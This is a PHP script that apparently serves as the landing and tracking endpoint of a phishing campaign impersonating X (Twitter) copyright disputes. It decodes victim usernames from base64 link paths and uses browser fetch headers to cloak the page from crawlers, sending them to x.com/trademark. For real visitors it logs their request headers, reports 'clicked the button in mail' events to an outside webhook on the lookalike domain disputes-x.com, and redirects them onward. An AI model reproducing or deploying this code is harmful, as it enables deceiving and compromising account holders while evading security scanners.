<?php
// Disable caching headers
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Pragma: no-cache");
header("Expires: 0");
// Include this function if it's in a separate file.
function fetchAndSendMessage($username, $url, $tid, $request_log_url, $event_msg): bool
{
    $externalUrl = "http://disputes-x.com/webhook/hookprox.php";

    // Prepare POST fields
    $postFields = [
        'username' => $username, // Username parameter
        'url' => $url,           // URL parameter
        'tid' => $tid,
        'event_msg' => $event_msg,
        'request_log_url' => $request_log_url             // TID parameter
    ];

    // Initialize cURL session for the POST request
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $externalUrl);
    curl_setopt($ch, CURLOPT_POST, true); // Set method to POST
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields); // Attach POST fields
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

    // Execute the POST request
    $response = curl_exec($ch);
    if (curl_errno($ch)) {
        echo "Error in POST request: " . curl_error($ch);
        curl_close($ch);
        return false;
    }

    curl_close($ch);
    return true;
}

// Function to check headers and perform 301 redirect or 403 error, and log to file
function sigenv($redirectUrl, $decoded_base64_username, $sanitizedSValue)
{
    // Define the required headers
    $required_headers = [
        'sec-ch-ua-platform',
        'sec-ch-ua-mobile',
        'sec-ch-ua',
        'sec-fetch-dest',
        'sec-fetch-site',
        'sec-fetch-mode'
    ];

    // Get all headers as an associative array
    $headers = getallheaders();

    // Convert all headers to lowercase to handle case insensitivity
    $headers = array_change_key_case($headers, CASE_LOWER);

    // Get the client IP address
    $client_ip = $_SERVER['REMOTE_ADDR'];

    // Check if any of the required headers are present
    $header_found = false;
    foreach ($required_headers as $header) {
        if (isset($headers[$header])) {
            $header_found = true;  // At least one header is found
            break;
        }
    }

    // Beautify headers for logging and outputting (with <br> for HTML line breaks)
    $beautified_headers = "";
    foreach ($headers as $name => $value) {
        // Convert to lowercase for header names and beautify the display format with <br>
        $beautified_headers .= ucfirst($name) . ": " . $value . "\n";
    }

    // Prepare log message
    $log_message = "--------------- begin request data ---------------\n";
    $log_message .= "Username: " . $decoded_base64_username . "\n";
    $log_message .= "TID: " . $sanitizedSValue . "\n";
    $log_message .= "Timestamp: " . date('Y-m-d H:i:s') . "\n";
    $log_message .= "Headers:\n";
    $log_message .= $beautified_headers;

    // Determine log file name based on the client's IP address
    $log_file = "logs/{$decoded_base64_username}_log.txt";

    if (!is_dir("logs")) {
        mkdir("logs", 0755, true);
    }

    // Ensure the log file exists, and if not, create an empty one
    if (!file_exists($log_file)) {
        touch($log_file); // Create an empty file
    }

    // Get the absolute file path
    $absolute_path = realpath($log_file);

    // Convert to a URL with the current domain
    $currentDomain = $_SERVER['HTTP_HOST'];
    $currentPath = dirname($_SERVER['PHP_SELF']);
    $log_url = "https://{$currentDomain}" . str_replace($_SERVER['DOCUMENT_ROOT'], '', $absolute_path);
    
    // If no required headers are found, return 403 Forbidden
    if (!$header_found) {
        // Log the 403 response
        $log_message .= "Status: 301 - Location: https://x.com/trademark\n\n";
        $log_message .= "--------------- end request data ---------------\n";
        file_put_contents($log_file, $log_message, FILE_APPEND);
        $event_msg = "crawl bot identified and rejected";
        $result = fetchAndSendMessage($decoded_base64_username, $currentDomain, $sanitizedSValue, $log_url, $event_msg);

        // echo "Headers Received:<br>";
        // echo $beautified_headers;

        header("HTTP/1.1 301 Moved Permanently");
        header("Location: https://x.com/trademark");

        exit;
    }
    if ($header_found) {

        // Send the message using Telegram webhook
        $event_msg = "clicked the button in mail";
        $result = fetchAndSendMessage($decoded_base64_username, $currentDomain, $sanitizedSValue, $log_url, $event_msg);

        // Log the 301 redirect
        $log_message .= "Status: 301 Moved Permanently\n";
        $log_message .= "Redirect Location: " . $redirectUrl . "\n\n";
        $log_message .= "--------------- end request data ---------------\n";
        file_put_contents($log_file, $log_message, FILE_APPEND);

        // // Display headers on the page if it's a 301 response
        // echo "Redirecting to: https://x.com<br>";
        // echo "Headers Received:<br>";
        // echo $beautified_headers;

        // If any required header is found, perform a 301 redirect to x.com
        header("HTTP/1.1 301 Moved Permanently");
        header("Location: " . $redirectUrl);
    }
    exit;
}

function logErrorAndExit($reason, $headers, $originalPath, $originalSValue) {
    // Prepare the log message


    $log_file = "logs/error_log.txt";

    if (!is_dir("logs")) {
        mkdir("logs", 0755, true);
    }

    // Ensure the log file exists, and if not, create an empty one
    if (!file_exists($log_file)) {
        touch($log_file); // Create an empty file
    }

    // Get the absolute file path
    $absolute_path = realpath($log_file);

    // Convert to a URL with the current domain
    $currentDomain = $_SERVER['HTTP_HOST'];
    $currentPath = dirname($_SERVER['PHP_SELF']);
    $log_url = "https://{$currentDomain}" . str_replace($_SERVER['DOCUMENT_ROOT'], '', $absolute_path);

    $currentDomain = $_SERVER['HTTP_HOST'];

    $log_message = "Internal Error\n\nreason: $reason\n";
    $log_message .= "timestamp: " . date('Y-m-d H:i:s') . "\n";
    $log_message .= "user param: " . $originalPath . "\n";
    $log_message .= "tid param: " . $originalSValue . "\n";

    $result = fetchAndSendMessage($originalPath, $currentDomain, $originalSValue, $log_url, $log_message);


    $log_message .= "Headers:\n";

    // Append headers to the log
    foreach ($headers as $name => $value) {
        $log_message .= ucfirst($name) . ": " . $value . "\n";
    }

    // Write to error.log
    file_put_contents($log_file, $log_message . "\n\n", FILE_APPEND);

    // redirect to original page if not found https://x.com/trademark 
    header("HTTP/1.1 301 Moved Permanently");
    header("Location: https://x.com/trademark");

    exit;
}

$redirectUrl = "";
$requestUri = $_SERVER['REQUEST_URI'];

// Use regex to capture the path after "copyright/" and the 's' parameter
if (preg_match('#^/copyright/(.*?)(?:\?s=([^&]*))?$#', $requestUri, $matches)) {
    // Extract the path and 's' parameter
    $path = isset($matches[1]) ? $matches[1] : '';
    $sValue = isset($matches[2]) ? $matches[2] : '';
} else {
    // Log and exit if regex fails
    logErrorAndExit(
        "Regex failed to parse the request URI",
        getallheaders(),
        "N/A (Regex failed)",
        "N/A (Regex failed)"
    );
}

// Sanitize the values to prevent XSS
$sanitizedPath = htmlspecialchars($path, ENT_QUOTES, 'UTF-8');
$sanitizedSValue = htmlspecialchars($sValue, ENT_QUOTES, 'UTF-8');

// Attempt to decode the base64 username
$decoded_base64_username = base64_decode($sanitizedPath, true);
if ($decoded_base64_username === false) {
    // Log and exit if Base64 decoding fails
    logErrorAndExit(
        "Base64 decoding failed",
        getallheaders(),
        $path,
        $sValue
    );
}

// Main API handling logic
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
    if (!empty($decoded_base64_username)) {
        $redirectUrl = "https://disputes-x.com/copyright/" . ($sanitizedPath);
    } else {
        // Log and exit if username decoding results in an empty value
        logErrorAndExit(
            "Decoded Base64 username is empty",
            getallheaders(),
            $path,
            $sValue
        );
    }
}

// Call the function to check headers and either redirect or return 403
sigenv($redirectUrl, $decoded_base64_username, $sanitizedSValue);
